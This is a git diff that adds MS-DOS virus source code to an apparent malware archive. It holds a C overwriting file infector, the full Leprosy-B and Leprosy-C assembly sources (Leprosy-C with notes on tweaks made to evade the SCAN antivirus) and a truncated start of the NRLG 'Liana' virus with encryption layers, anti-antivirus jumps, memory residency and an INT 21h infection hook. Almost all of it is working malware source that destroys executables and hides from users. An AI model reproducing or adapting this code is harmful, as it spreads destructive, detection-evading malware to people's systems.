CR/LF combo encrypted. */ +#define NO_MATCH 0x12 /* No match in wildcard search. */ + + +/* The following strings are not garbled; they are all encrypted */ +/* using the simple technique of adding the integer value 10 to */ +/* each character. They are automatically decrypted by */ +/* 'print_s()', the function which sends the strings to 'stdout' */ +/* using DOS service 09H. All are terminated with a dollar-sign */ +/* "$" as per DOS service specifications. */ + +char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; +char *virus_msg[3] = + { + CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", + CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", + CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." + }; + + + +struct _dta /* Disk Transfer Area format for find. */ + { + char findnext[21]; + char attribute; + int timestamp; + int datestamp; + long filesize; + char filename[13]; + } *dta = (struct _dta *) 0x80; /* Set it to default DTA. */ + + +const char filler[] = "XX"; /* Pad file length to 666 bytes. */ +const char *codestart = (char *) 0x100; /* Memory where virus code begins. */ +const int virus_size = 666; /* The size in bytes of the virus code. */ +const int infection_rate = 4; /* How many files to infect per run. */ + +char compare_buf[20]; /* Load program here to test infection. */ +int handle; /* The current file handle being used. */ +int datestamp, timestamp; /* Store original date and time here. */ +char diseased_count = 0; /* How many infected files found so far. */ +char success = 0; /* How many infected this run. */ + + +/* The following are function prototypes, in keeping with ANSI */ +/* Standard C, for the support functions of this program. */ + +int find_first( char *fn ); +int find_healthy( void ); +int find_next( void ); +int healthy( void ); +void infect( void ); +void close_handle( void ); +void open_handle( char *fn ); +void print_s( char *s ); +void restore_timestamp( void ); + + + +/*----------------------------------*/ +/* M A I N P R O G R A M */ +/*----------------------------------*/ + +int main( void ) { + int x = 0; + do { + if ( find_healthy() ) { /* Is there an un-infected file? */ + infect(); /* Well, then infect it! */ + x++; /* Add one to the counter. */ + success++; /* Carve a notch in our belt. */ + } + else { /* If there ain't a file here... */ + _DX = (int) ".."; /* See if we can step back to */ + _AH = 0x3b; /* the parent directory, and try */ + asm int 21H; /* there. */ + x++; /* Increment the counter anyway, to */ + } /* avoid infinite loops. */ + } while( x < infection_rate ); /* Do this until we've had enough. */ + if ( success ) /* If we got something this time, */ + print_s( fake_msg ); /* feed 'em the phony error line. */ + else + if ( diseased_count > 6 ) /* If we found 6+ infected files */ + for( x = 0; x < 3; x++ ) /* along the way, laugh!! */ + print_s( virus_msg[x] ); + else + print_s( fake_msg ); /* Otherwise, keep a low profile. */ + return; +} + + +void infect( void ) { + _DX = (int) dta->filename; /* DX register points to filename. */ + _CX = 0x00; /* No attribute flags are set. */ + _AL = 0x01; /* Use Set Attribute sub-function. */ + _AH = 0x43; /* Assure access to write file. */ + asm int 21H; /* Call DOS interrupt. */ + open_handle( dta->filename ); /* Re-open the healthy file. */ + _BX = handle; /* BX register holds handle. */ + _CX = virus_size; /* Number of bytes to write. */ + _DX = (int) codestart; /* Write program code. */ + _AH = 0x40; /* Set up and call DOS. */ + asm int 21H; + restore_timestamp(); /* Keep original date & time. */ + close_handle(); /* Close file. */ + return; +} + + +int find_healthy( void ) { + if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */ + if ( healthy() ) /* If it's healthy, OK! */ + return 1; + else + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ + if ( healthy() ) + return 1; /* If you find one, great! */ + if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */ + if ( healthy() ) /* If it's healthy, OK! */ + return 1; + else + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ + if ( healthy() ) + return 1; /* If you find one, great! */ + return 0; /* Otherwise, say so. */ +} + + + +int healthy( void ) { + int i; + datestamp = dta->datestamp; /* Save time & date for later. */ + timestamp = dta->timestamp; + open_handle( dta->filename ); /* Open last file located. */ + _BX = handle; /* BX holds current file handle. */ + _CX = 20; /* We only want a few bytes. */ + _DX = (int) compare_buf; /* DX points to the scratch buffer. */ + _AH = 0x3f; /* Read in file for comparison. */ + asm int 21H; + restore_timestamp(); /* Keep original date & time. */ + close_handle(); /* Close the file. */ + for ( i = 0; i < 20; i++ ) /* Compare to virus code. */ + if ( compare_buf[i] != *(codestart+i) ) + return 1; /* If no match, return healthy. */ + diseased_count++; /* Chalk up one more fucked file. */ + return 0; /* Otherwise, return infected. */ +} + + +void restore_timestamp( void ) { + _AL = 0x01; /* Keep original date & time. */ + _BX = handle; /* Same file handle. */ + _CX = timestamp; /* Get time & date from DTA. */ + _DX = datestamp; + _AH = 0x57; /* Do DOS service. */ + asm int 21H; + return; +} + + +void print_s( char *s ) { + char *p = s; + while ( *p ) { /* Subtract 10 from every character. */ + *p -= 10; + p++; + } + _DX = (int) s; /* Set DX to point to adjusted string. */ + _AH = 0x09; /* Set DOS function number. */ + asm int 21H; /* Call DOS interrupt. */ + return; +} + + +int find_first( char *fn ) { + _DX = (int) fn; /* Point DX to the file name. */ + _CX = 0xff; /* Search for all attributes. */ + _AH = 0x4e; /* 'Find first' DOS service. */ + asm int 21H; /* Go, DOS, go. */ + return _AX; /* Return possible error code. */ +} + + +int find_next( void ) { + _AH = 0x4f; /* 'Find next' function. */ + asm int 21H; /* Call DOS. */ + return _AX; /* Return any error code. */ +} + + +void open_handle( char *fn ) { + _DX = (int) fn; /* Point DX to the filename. */ + _AL = 0x02; /* Always open for both read & write. */ + _AH = 0x3d; /* "Open handle" service. */ + asm int 21H; /* Call DOS. */ + handle = _AX; /* Assume handle returned OK. */ + return; +} + + +void close_handle( void ) { + _BX = handle; /* Load BX register w/current file handle. */ + _AH = 0x3e; /* Set up and call DOS service. */ + asm int 21H; + return; +} diff --git a/MSDOS/Virus.MSDOS.Unknown.leprosyb.asm b/MSDOS/Virus.MSDOS.Unknown.leprosyb.asm new file mode 100644 index 00000000..5da9ad39 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.leprosyb.asm @@ -0,0 +1,242 @@ +; - Leprosy-B Virus Source +; Copy-ya-right (c) 1990 by PCM2. +; +; This file is the source code to the Leprosy-B virus. It should +; be assembled with an MASM-compatible assembler; it has been tested +; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0. +; It should be made into a .COM file before executing, with either +; the "/t" command line flag in TLINK or Microsoft's EXE2BIN utility. +; +; This program has the potential to permanently destroy executable +; images on any disk medium. Other modifications may have been made +; subsequent to the original release by the author, either benign, +; or which could result in further harm should this program be run. +; In any case, the author assumes no responsibility for any damage +; caused by this program, incidental or otherwise. As a precaution, +; this program should not be turned over to irresponsible hands... +; (unlike people like us, that is). + + + title "Leprosy-B Virus by PCM2, August 1990" + +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +virus_size equ 666 ; Size of the virus file +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +;--------------------------------------------------------------------- +; All executable code is contained in boundaries of procedure "main". +; The following code, until the start of "virus_code", is the non- +; encrypted CMT portion of the code to load up the real program. +;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + +encrypt_val db 00h ; Hold value to encrypt by here + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the virus code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov ah,[bx] ; Get the current byte + xor ah,encrypt_val ; Engage/disengage XOR scheme on it + mov [bx],ah ; Put it back where we got it + inc bx ; Move BX ahead a byte + cmp bx,offset virus_code+virus_size ; Are we at the end? + jle xor_loop ; If not, do another cycle + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. +;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. +;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Program too big to fit in memory$" +virus_msg1 db cr,lf,tab,"ATTENTION! Your computer has been afflicted with$" +virus_msg2 db cr,lf,tab,"the incurable decay that is the fate wrought by$" +virus_msg3 db cr,lf,tab,"Leprosy Strain B, a virus employing Cybernetic$" +virus_msg4 db cr,lf,tab,"Mutation Technology(tm) and invented by PCM2 08/90.$" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,6 ; Are at least 6 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h + jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.leprosyc.asm b/MSDOS/Virus.MSDOS.Unknown.leprosyc.asm new file mode 100644 index 00000000..f23db2a8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.leprosyc.asm @@ -0,0 +1,297 @@ +; - Leprosy-B Virus Source +; Copy-ya-right (c) 1990 by PCM2. +; +; This file is the source code to the Leprosy-B virus. It should +; be assembled with an MASM-compatible assembler; it has been tested +; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0. +; It should be made into a .COM file before executing, with either +; the "/t" command line flag in TLINK or Microsoft's EXE2BIN utility. +; +; This program has the potential to permanently destroy executable +; images on any disk medium. Other modifications may have been made +; subsequent to the original release by the author, either benign, +; or which could result in further harm should this program be run. +; In any case, the author assumes no responsibility for any damage +; caused by this program, incidental or otherwise. As a precaution, +; this program should not be turned over to irresponsible hands... +; (unlike people like us, that is). +; +;;-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=-=ð°±²Û²±°ð=- +;; +;; - This virus is not really Leprosy-B. It is, in +;; fact, ALMOST the same. When I encountered the +;; source code and assembled it, I found, obviously +;; to my disappointment, that SCAN v77 could find +;; it. Since it is a self-encrypting virus, I knew +;; EXACTLY how to fix this problem (after all, +;; being part of McPhee's programs is a sure way to +;; know that your virus has been a big hit, but it +;; also means that it will soon meet a terrible end. +;; Presented with such a sad situation, I decided I +;; would modify the virus to give it one more shot +;; at the outside world. Not only that, but I will +;; make TWO new versions. This one, in particular, +;; will preserve the traditional length of 666, and +;; will only have a slight modification. You see, +;; since the virus encrypts itself, McPhee must go +;; on 1 or both of two paths. He must either use +;; the whole non-encrypted portion as an ID string, +;; or he must use the file offset where the value +;; for decrypting is normally stored, XOR it with +;; the rest of the program (this is how it encrypts +;; and decrypts itself), and then try to identify +;; the decrypted code as the virus. By changing +;; where the encryption value is stored in the non- +;; encrypted portion and putting a zero there in- +;; stead, (along with altering the primary instruc- +;; tions slightly), I have made it undetectable by +;; SCAN, despite the fact that it is (in all other +;; aspects) the same damn thing. +;; Have fun! +;; The BOOT SECTOR Infector... +;; +;; NOTE: Also, (in case you haven't already noticed) all of the changes +;; I make to this program will have a double semicolon (;;) on +;; them somewhere. This is to reinforce the fact that I DID +;; NOT do the original work on this virus. That credit is left +;; appropriately to PCM2. And I respect his brilliance in its +;; coding (especially the encrypt/decrypt portion!) +;; L8r peepz! +;; + + + + title "Leprosy-C Virus by PCM2, August 1990" +;; With additional modifications by TBSI, June 1991 + + +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +virus_size equ 666 ; Size of the virus file +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +;--------------------------------------------------------------------- +; All executable code is contained in boundaries of procedure "main". +; The following code, until the start of "virus_code", is the non- +; encrypted CMT portion of the code to load up the real program. +;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + db 0 ;; This line inserted by TBSI. If + ;; McPhee uses the second technique + ;; described in my speech, then it + ;; will find the zero and consider + ;; it to be the value it wants, even + ;; though using a zero will make it + ;; do absolutely NOTHING! +encrypt_val db 00h ; Hold value to encrypt by here + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + nop ;; Added by TBSI to through of McPhee + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the virus code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov ah,[bx] ; Get the current byte + xor ah,encrypt_val ; Engage/disengage XOR scheme on it + mov [bx],ah ; Put it back where we got it + inc bx ; Move BX ahead a byte + nop ;; Added by TBSI to through of McPhee + cmp bx,offset virus_code+virus_size ; Are we at the end? + jle xor_loop ; If not, do another cycle + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. +;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. +;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Program too big to fit in memory$" +virus_msg1 db cr,lf,tab,"ATTENTION! Your computer has been afflicted with$" +virus_msg2 db cr,lf,tab,"the incurable decay that is the fate wrought by$" +virus_msg3 db cr,lf,tab,"Leprosy Strain B, a virus employing Cybernetic$" +virus_msg4 db cr,lf,tab,"Mutation Technology(tm) and invented by PCM2 08/90.$" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,6 ; Are at least 6 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h + jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.liana.asm b/MSDOS/Virus.MSDOS.Unknown.liana.asm new file mode 100644 index 00000000..29fe1751 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.liana.asm @@ -0,0 +1,473 @@ +;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR +;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ +;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR +;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ +;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR +;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +; Liana Virus, created by Gehenna on 20 May 96! + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +ÿsub byte ptr [di],07ch +not byte ptr [di] +xor word ptr [di],03c11h +xor byte ptr [di],069h +xor byte ptr [di],0ch +xor byte ptr [di],0a2h +not word ptr [di] +add word ptr [di],05875h +inc word ptr [di] +add byte ptr [di],049h +add word ptr [di],0ecb8h +xor byte ptr [di],0f8h +add byte ptr [di],083h +not word ptr [di] +add byte ptr [di],02h +ÿinc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +ÿcall ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! +;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db 'N.R.L.G. by Gehenna' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- 